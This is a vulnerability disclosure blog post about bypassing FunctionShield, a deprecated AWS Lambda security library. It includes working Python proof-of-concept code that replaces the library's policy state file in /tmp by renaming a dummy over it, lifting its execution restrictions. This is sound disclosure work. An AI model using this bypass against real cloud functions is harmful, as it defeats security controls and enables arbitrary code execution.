Breaking the FunctionShield cloud security library by Hexway

Description
Process

TL;DR We've found a vulnerability in FunctionShield, a cloud security library, that allows bypassing its tightest restrictions completely.

All technical details can be found in the "Process" section.

Cloud computing platforms are highly common these days. Fortunately, the times when companies used to make silly mistakes like leaving the Amazon S3 bucket open are gone. Yet, the cloud ecosphere remains counter-intuitive for many users, and they can and will make mistakes.

Take AWS Lambda, for example. On-demand execution of user code in a serverless ecosystem, what could go wrong? When user code is involved, there are plenty of ways to shoot yourself in the foot. This problem is fairly obvious, and some products have been developed to keep your cloud application safe.

One of them is FunctionShield.

Important note: FunctionShield is no longer maintained by the developers. So, it looks like there won't be any security patches - that's a very solid reason for not using it because you can't rely on it anymore.

It's a free library, and it seems to be secure, so why not use it? Check the statistics. There are no stats for pip or pip3, only for npm:

FunctionShield%20Description/Untitled.png

https://npm-stat.com/charts.html?package=%40puresec%2Ffunction-shield&from=2019-12-01&to=2019-12-31

So, that's still about 8800 npm downloads in December 2019.

Still, FunctionShield is used in some middleware software for AWS Lambda:

https://github.com/middyjs/middy

Tech sites and blogs recommend using it, and some cloud security lists include it:

https://geekflare.com/serverless-application-security/

https://www.jeremydaly.com/serverless-security-with-functionshield/

https://anir0y.live/class/blog/securityaudit-aws/

And here's some guy saying that their company uses it in production (please don't):

https://blog.innomizetech.com/2019/11/19/07-best-practices-when-using-aws-ssm-parameter-store/

You get the point - people out there are still using FunctionShield.

So, let's see how this library works.

How FunctionShield works

FunctionShield is a compiled library and can be used in applications on Node.js, Python, or Java. It's specialized for working in AWS (AWS Lambda) and Google Cloud Functions environments.

FunctionShield has five options: four of them are policies that restrict code execution to prevent potentially malicious activities, and the fifth is a switch that disables the sending of telemetry to the developers' server.

Now, let's look at the four restrictive policies:

Disable read and write to tmp folder
Disable spawning child processes
Disable network interaction
Disable reading of the handler's source code file (in our case, it's handler.py).

Each option has three modes:

Block - the library interrupts every attempt to perform the restricted type of action;

Alert - sends alerts when triggered;

Allow - does nothing.
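
To make the option/mode matrix concrete, here is a minimal sketch of a validator for a policy dictionary. The four policy keys are the ones passed to function_shield.configure later in this article; the helper name validate_policy is hypothetical and is not part of the library.

```python
# Hypothetical helper, NOT part of FunctionShield.
# Policy names are taken from the configuration shown later in this article.
POLICIES = {
    "outbound_connectivity",
    "read_write_tmp",
    "create_child_process",
    "read_handler",
}
MODES = {"block", "alert", "allow"}


def validate_policy(policy):
    """Return a list of problems found in a policy dict (empty if none)."""
    problems = []
    for name, mode in policy.items():
        if name not in POLICIES:
            problems.append(f"unknown policy: {name}")
        elif mode not in MODES:
            problems.append(f"invalid mode for {name}: {mode}")
    return problems


print(validate_policy({"read_handler": "block", "read_write_tmp": "deny"}))
```

A check like this only catches typos in the configuration. It says nothing about whether the library actually enforces the modes.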

We tested the Python version of FunctionShield on AWS Lambda.

Vulnerability: TL;DR

The FunctionShield library stores its permission rules in a binary file in the tmp folder on the system. If an attacker is able to rewrite it, FunctionShield will think that spawning child processes is allowed. From this moment on, the attacker is able to create child processes that are not covered by FunctionShield's rule set, so they are not affected by any restrictions.

For full technical coverage of this vulnerability, go to the second part of this article - the research process.

Solution:

Do not rely on FunctionShield!

Currently, it is useless. Since FunctionShield is now deprecated, we don't think that will change in the future. All you need in a modern cloud environment is to figure out your role system and configure it right. Yes, sometimes it's hard to do, but if you can't set up your cloud role system according to your situation - you're sitting on a time bomb, and no magic library will save you.
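
As a rough illustration of what "configure it right" can mean, here is a sketch of a least-privilege policy document for a function's execution role, written as a Python dict in the standard IAM JSON layout. The bucket name and the single allowed action are assumptions made up for this example, and wildcard_statements is a hypothetical helper, not an AWS API.

```python
import json

# Illustrative policy: the function may only read objects from one bucket.
# "example-bucket" and the chosen action are assumptions for this sketch.
policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:GetObject"],
            "Resource": "arn:aws:s3:::example-bucket/*",
        }
    ],
}


def as_list(value):
    """IAM allows a single string or a list; normalize to a list."""
    return value if isinstance(value, list) else [value]


def wildcard_statements(doc):
    """Return Allow statements that grant every action or every resource."""
    flagged = []
    for stmt in doc["Statement"]:
        if stmt["Effect"] != "Allow":
            continue
        if "*" in as_list(stmt["Action"]) or "*" in as_list(stmt["Resource"]):
            flagged.append(stmt)
    return flagged


print(json.dumps(policy, indent=2))
print("wildcard statements:", len(wildcard_statements(policy)))
```

The point is that the restriction lives in the platform's role system, outside the function's process, so code running inside the function cannot rewrite it the way it can rewrite a file in /tmp.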

Author: md5(d22b44ecf71c2c2686c58e817a8f03e0)

Part I. Setup

Let's assume that we're using the following Python script (handler.py in /functionshield):


    #!/usr/bin/python3
    import subprocess
    import urllib.request
    import traceback
    import logging
    import os

    def testChildProcess():
        #Testing child process creation:
        helloworld = subprocess.check_output(["echo","Hello world!"])
        helloworld = helloworld.decode(encoding='UTF-8')
        print(helloworld)

    def testNetwork():
        #Testing network interaction:
        f = urllib.request.urlopen("https://hexway.io/")
        print(f.getcode())
        print()

    def testHandlerReading():
        #Testing handler reading:
        handler = open("./handler.py", "r")
        print(len(handler.read()))

    #Debug code to catch the errors and print them:
    try:
        testChildProcess()
    except Exception as e:
        logging.error(traceback.format_exc())

    try:
        testNetwork()
    except Exception as e:
        logging.error(traceback.format_exc())

    try:
        testHandlerReading()
    except Exception as e:
        logging.error(traceback.format_exc())

If we run it, that's what we will get:

FunctionShield%20Process/Untitled%0.png

That's the result of our child process with echo, the response code from hexway.io and the number of symbols in our handler.py script.

Neat!

Now let's get to FunctionShield.

First, we need to set it up. Install the latest version from pip3:


    pip3 install function-shield

If you try to use it just like that, you'll get an error saying that it can only work in an AWS or Google Cloud Functions environment.

It can be easily fixed. You need to edit the Python wrapper, which is located in /usr/local/lib/python3.7/dist-packages/function_shield/__init__.py. Add these lines at the beginning of the script:


    import os
    os.environ['AWS_EXECUTION_ENV'] = "1"

To use this library, we need a FunctionShield token. You can get it from the developer's website. In this case, you have to put it in the FUNCTION_SHIELD_TOKEN environment variable. Now, we will configure it in our handler.py script; that's what we add after imports at the beginning of the file:


    import function_shield

    #We need this part to change the environment and show FunctionShield where our handler file is
    os.environ["_HANDLER"] = "handler.py"
    os.environ["LAMBDA_TASK_ROOT"] = "/functionshield"
    os.environ["LAMBDA_RUNTIME_DIR"] = "/functionshield"

    #Initialize configuring function and run it afterward
    def functionshieldConfigure():
        function_shield.configure({
            "policy": {
                "outbound_connectivity": "block",
                "read_write_tmp": "allow",
                "create_child_process": "block",
                "read_handler": "block"
            },
            "token": os.environ["FUNCTION_SHIELD_TOKEN"]
        })
    functionshieldConfigure()

Now, everything except reading from and writing to the /tmp/ folder is blocked.

Okay, now you will get something like this:


    {"details":{"arguments":["echo","Hello world!"],"path":"/usr/bin/echo"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.110491Z","policy":"create_child_process","mode":"block"}

    {"details":{"path":"/functionshield/handler.py"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.111471Z","policy":"read_handler","mode":"block"}

    {"details":{"path":"/functionshield/handler.py"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.111670Z","policy":"read_handler","mode":"block"}
    ERROR:root:Traceback (most recent call last):
      File "./handler.py", line 45, in <module>
      File "./handler.py", line 29, in testChildProcess
      File "/usr/lib/python3.7/subprocess.py", line 395, in check_output
        **kwargs).stdout
      File "/usr/lib/python3.7/subprocess.py", line 487, in run
        output=stdout, stderr=stderr)
    subprocess.CalledProcessError: Command '['echo', 'Hello world!']' returned non-zero exit status 222.

    {"details":{"host":"hexway.io","ip":"78.47.164.34"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.131352Z","policy":"outbound_connectivity","mode":"block"}

    {"details":{"path":"/functionshield/handler.py"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.131824Z","policy":"read_handler","mode":"block"}

    {"details":{"path":"/functionshield/handler.py"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.132025Z","policy":"read_handler","mode":"block"}
    ERROR:root:Traceback (most recent call last):
      File "/usr/lib/python3.7/urllib/request.py", line 1317, in do_open
        encode_chunked=req.has_header('Transfer-encoding'))
      File "/usr/lib/python3.7/http/client.py", line 1244, in request
        self._send_request(method, url, body, headers, encode_chunked)
      File "/usr/lib/python3.7/http/client.py", line 1290, in _send_request
        self.endheaders(body, encode_chunked=encode_chunked)
      File "/usr/lib/python3.7/http/client.py", line 1239, in endheaders
        self._send_output(message_body, encode_chunked=encode_chunked)
      File "/usr/lib/python3.7/http/client.py", line 1026, in _send_output
        self.send(msg)
      File "/usr/lib/python3.7/http/client.py", line 966, in send
        self.connect()
      File "/usr/lib/python3.7/http/client.py", line 1406, in connect
        super().connect()
      File "/usr/lib/python3.7/http/client.py", line 938, in connect
        (self.host,self.port), self.timeout, self.source_address)
      File "/usr/lib/python3.7/socket.py", line 727, in create_connection
        raise err
      File "/usr/lib/python3.7/socket.py", line 716, in create_connection
        sock.connect(sa)
    OSError: [Errno 222] Unknown error 222

    During the handling of the exception above, another exception occurred:

    Traceback (most recent call last):
      File "./handler.py", line 50, in <module>
      File "./handler.py", line 35, in testNetwork
      File "/usr/lib/python3.7/urllib/request.py", line 222, in urlopen
        return opener.open(url, data, timeout)
      File "/usr/lib/python3.7/urllib/request.py", line 525, in open
        response = self._open(req, data)
      File "/usr/lib/python3.7/urllib/request.py", line 543, in _open
        '_open', req)
      File "/usr/lib/python3.7/urllib/request.py", line 503, in _call_chain
        result = func(*args)
      File "/usr/lib/python3.7/urllib/request.py", line 1360, in https_open
        context=self._context, check_hostname=self._check_hostname)
      File "/usr/lib/python3.7/urllib/request.py", line 1319, in do_open
        raise URLError(err)
    urllib.error.URLError: <urlopen error [Errno 222] Unknown error 222>

    {"details":{"path":"/functionshield/handler.py"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.133761Z","policy":"read_handler","mode":"block"}

    {"details":{"path":"/functionshield/handler.py"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.133904Z","policy":"read_handler","mode":"block"}

    {"details":{"path":"/functionshield/handler.py"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.133979Z","policy":"read_handler","mode":"block"}
    ERROR:root:Traceback (most recent call last):
      File "./handler.py", line 55, in <module>
      File "./handler.py", line 41, in testHandlerReading
    OSError: [Errno 222] Unknown error 222: './handler.py'

Every time we try using something restricted, we get error 222. It's a custom error that is used only by FunctionShield in response to a blocked policy.
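
Since the same code shows up in three different shapes in the log above (an exit status, a plain OSError, and an OSError wrapped in a URLError), a small helper can tell a FunctionShield block apart from an ordinary failure. This is a sketch based only on the output above; the function name is hypothetical and the value 222 is simply what we observed.

```python
import subprocess
import urllib.error

# Value observed in the logs above; treated here as an assumption, not a documented constant.
FUNCTION_SHIELD_CODE = 222


def blocked_by_functionshield(exc):
    """Return True if the exception carries the 222 code seen in the logs."""
    # Blocked child process: the command "exits" with status 222.
    if isinstance(exc, subprocess.CalledProcessError):
        return exc.returncode == FUNCTION_SHIELD_CODE
    # urllib wraps the underlying OSError in URLError.reason, so unwrap it first.
    reason = getattr(exc, "reason", None)
    if isinstance(reason, OSError):
        exc = reason
    return isinstance(exc, OSError) and exc.errno == FUNCTION_SHIELD_CODE


wrapped = urllib.error.URLError(OSError(222, "Unknown error 222"))
print(blocked_by_functionshield(wrapped))
```

The URLError case is checked before the generic OSError case on purpose: URLError is itself an OSError subclass, but its own errno is not set, so the code has to be read from the wrapped reason.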

Part II. First strike

What happens when you configure the library? It must place its policies somewhere - somewhere safe.

It stores them in the tmp directory.

Wait, what?

FunctionShield%20Process/Untitled%201.png

Oh, this doesn't look good.

Every process of library configuration creates a new file in /tmp/.

Let's look at the structure of the file, there's a chunk of bytes in the beginning:

FunctionShield%20Process/Untitled%202.png
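
If you want to reproduce a dump like this yourself, a sketch along these lines should do. The "functionshield" substring in the file name and the 24-byte length are taken from the exploit code in this article; the function name is hypothetical, and the demo runs against a fake file in a throwaway directory whose contents are made up and do not mirror the real layout.

```python
import os
import tempfile


def dump_state_headers(directory="/tmp", marker="functionshield", length=24):
    """Map each matching file name to the hex of its first `length` bytes."""
    headers = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if marker in name and os.path.isfile(path):
            with open(path, "rb") as fh:
                data = fh.read(length)
            headers[name] = " ".join(f"{b:02x}" for b in data)
    return headers


# Demo on a temporary directory with a fake file (arbitrary bytes).
with tempfile.TemporaryDirectory() as demo_dir:
    with open(os.path.join(demo_dir, "functionshield_demo"), "wb") as fh:
        fh.write(bytes([2, 0, 2, 2]) + bytes(28))
    demo = dump_state_headers(demo_dir, length=4)
print(demo)
```

Running it before and after changing a policy makes it easy to see which bytes differ.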

So, if we change policies, we will see that there are 4 bytes that change. All 02 bytes are "Block" policies; the 5th "00" byte is an "Allow /tmp writing" policy. There's no chance that the library uses this file after configuration! Probably, it just writes it there to move it to a proper place later. Let's just try to replace this first chunk of bytes with zeros by adding this code just before the try/except section:


    #Policy rewrite exploit
    tempfiles = os.listdir('/tmp')
    for file in tempfiles:
        if "functionshield" in file:
            print(file)
            #Overwrite the first 24 bytes of the state file with zeros;
            #the with-block makes sure the file is actually closed
            with open("/tmp/" + file, "r+b") as statefile:
                statefile.seek(0)
                statefile.write(b"\x00" * 24)

Again, let's try to use some restricted actions.

Nope, it doesn't work.

If you try to use this exploit on the latest version, you won't get anything because this bug was fixed in the October patch.

Hnnng.

You know what? At this point, let's raise the stakes.

We will not only use the latest version from pip3 but also reconfigure FunctionShield to block everything:


    function_shield.configure({
        "policy": {
            "outbound_connectivity": "block",
            "read_write_tmp": "block",
            "create_child_process": "block",
            "read_handler": "block"
        },
        "token": os.environ['FUNCTION_SHIELD_TOKEN']
    })

Are we safe now?

No, we're not.

Part III. Diving deeper

The most important question now is - how does this library work on a lower level?

In this case, there's a simple Python wrapper around the functionshield.so binary library. Since it's binary, looking at the syscalls made when an action gets blocked would be a good place to start. Here are two parts of the strace output: the script is trying to spawn a new "echo 'Hello world!'" child process, like we did before.

Without FunctionShield:

FunctionShield%20Process/Untitled%203.png

With FunctionShield:

FunctionShield%20Process/Untitled%204.png

You see? There's a brk in the middle right after a clone and two close system calls.

Our guess is that this library just has a blacklist of syscalls. After configuring FunctionShield, it waits until some higher-level code tries to use those syscalls from the blacklist (generated with the help of a policy file) on the OS level. In the case of malicious syscalls, the library breaks the execution of the thread.

The main issue with blacklists is that you can never foresee every unwanted scenario. So, a blacklist can't block undesired behavior in 100% of cases.
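
Here is a toy model of that weakness. It has nothing to do with FunctionShield's real internals, which we haven't reversed; the listed names are just common syscalls (clone appears in the trace above), and is_allowed is a hypothetical function.

```python
# Toy denylist: only the names its author thought of are rejected.
# This is an illustration, NOT how FunctionShield is implemented.
DENYLIST = {"clone", "openat", "write"}


def is_allowed(syscall_name):
    """Anything that is not explicitly listed passes the check."""
    return syscall_name not in DENYLIST


for name in ("clone", "openat", "linkat"):
    print(name, "allowed" if is_allowed(name) else "blocked")
```

An allowlist flips the default: anything not explicitly permitted is rejected, so a forgotten entry breaks functionality instead of breaking security.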

That was the part with child process creation. Let's see what happens if we try to rewrite some bytes in the state file using the exploit from above.

Without FunctionShield:

FunctionShield%20Process/Untitled%205.png

With FunctionShield:

FunctionShield%20Process/Untitled%206.png

As you can see, this defense mechanism won't let us write anything to the actual FunctionShield state file. FunctionShield contains the path to the actual state file in its memory and stops at every attempt to open it and write something.

Alright, we know what we need to change: the state file in the /tmp directory. But we can't just overwrite it, because we can't use the "openat" or "write" syscalls on any files in /tmp. What else could we do? Are there any other Python wrappers around Linux syscalls that we can use in this situation?

After a while, we found a way: what if we just move it?

As you know, to rename a file or a folder in Linux you can use the mv command. Within a single filesystem, it uses the rename system call to tell the OS which file you want to rename and what the new name is. Okay, what's the wrapper for this in Python? os.rename(), for example.
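
Why would that help? A rename only changes the directory entry; the file's contents are never opened or written. The following sketch shows this on a scratch directory, without FunctionShield involved: the inode number and the content stay the same after os.rename(). The function and file names are made up for the demo.

```python
import os
import tempfile


def rename_keeps_inode(directory):
    """Rename a file and report whether its inode and content survived."""
    src = os.path.join(directory, "before")
    dst = os.path.join(directory, "after")
    with open(src, "wb") as fh:
        fh.write(b"payload")
    inode_before = os.stat(src).st_ino
    os.rename(src, dst)  # only the directory entry changes
    with open(dst, "rb") as fh:
        content = fh.read()
    return os.stat(dst).st_ino == inode_before, content


with tempfile.TemporaryDirectory() as scratch:
    same_inode, content = rename_keeps_inode(scratch)
print(same_inode, content)
```

So a guard that only watches for files being opened or written has, in principle, no reason to notice a rename.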

Let's try it with FunctionShield on with this code:


    #Trying to move actual policy file:
    tempfiles = os.listdir('/tmp')
    for file in tempfiles:
        if "functionshield" in file:
            print("Moving file: " + file)
            os.rename("/tmp/" + file, "/tmp/renamed")
            print("File moved")

And the result is:

FunctionShield%20Process/Untitled%207.png

Woah, it worked! Alright, we can rename the policy file, but there's a bunch of 222 errors after that. So, here's the plan - we will replace the state file with a dummy:


    #Dummy exploit:
    def createDummy():
        #Create a one-byte dummy file next to the handler
        with open("./dummy", "w+b") as file:
            file.write(b"\x00")
    def shieldBasher():
        tmp = os.listdir("/tmp/")
        for x in tmp:
            if "functionshield_state" in x:
                createDummy()
                #Renaming the dummy onto the state file replaces it
                os.rename("./dummy", "/tmp/" + x)
    shieldBasher()

Alright, what about policies?

FunctionShield%20Process/Untitled%208.png

So, the child spawning test worked and all others didn't. We don't need them anyway. Why?

Since FunctionShield doesn't control the child processes, we can now do anything we want by using, for example, subprocess.check_output.

At this point, we've bypassed all the library's restrictions. We haven't tested other languages (Java, Node.js), but at least in Python it looks like this:

if an attacker has the ability to move and rewrite files, they can bypass the FunctionShield library

What's the point of using it then?

Afterword

There are two curious details about FunctionShield's workflow that we want to mention:

The state file has not only the flags for FunctionShield's policies but also a cookie to reconfigure it. It's possible to get the environment variable containing the FunctionShield token, read the cookie, and reconfigure the library to wipe all restrictions. All you need to do is read the state file.
Besides replacing a state file with a dummy, you can also move an actual state file, replace the first chunk of data with zero bytes, and rename it back. A curious thing here: somehow this disables all blocking rules but only when there are already a few state files in the /tmp/ folder.
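
The second variant (move, zero, rename back) can be sketched like this. The demo below runs against a fake file in a throwaway directory, not against FunctionShield; the 24-byte length is borrowed from the first exploit attempt, and the function name and scratch location are hypothetical.

```python
import os
import tempfile


def zero_header_via_rename(state_path, scratch_path, length=24):
    """Move the file aside, zero its first `length` bytes, then move it back."""
    os.rename(state_path, scratch_path)
    # "r+b" overwrites in place without truncating the rest of the file
    with open(scratch_path, "r+b") as fh:
        fh.write(b"\x00" * length)
    os.rename(scratch_path, state_path)


# Demo with a fake state file made of 32 bytes of 0x02.
with tempfile.TemporaryDirectory() as demo_dir:
    state = os.path.join(demo_dir, "functionshield_state_demo")
    with open(state, "wb") as fh:
        fh.write(b"\x02" * 32)
    zero_header_via_rename(state, os.path.join(demo_dir, "scratch"))
    with open(state, "rb") as fh:
        result = fh.read()
print(result[:24] == b"\x00" * 24, len(result))
```

In the real scenario the scratch path has to be on the same filesystem as the state file, because os.rename() does not work across filesystems.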
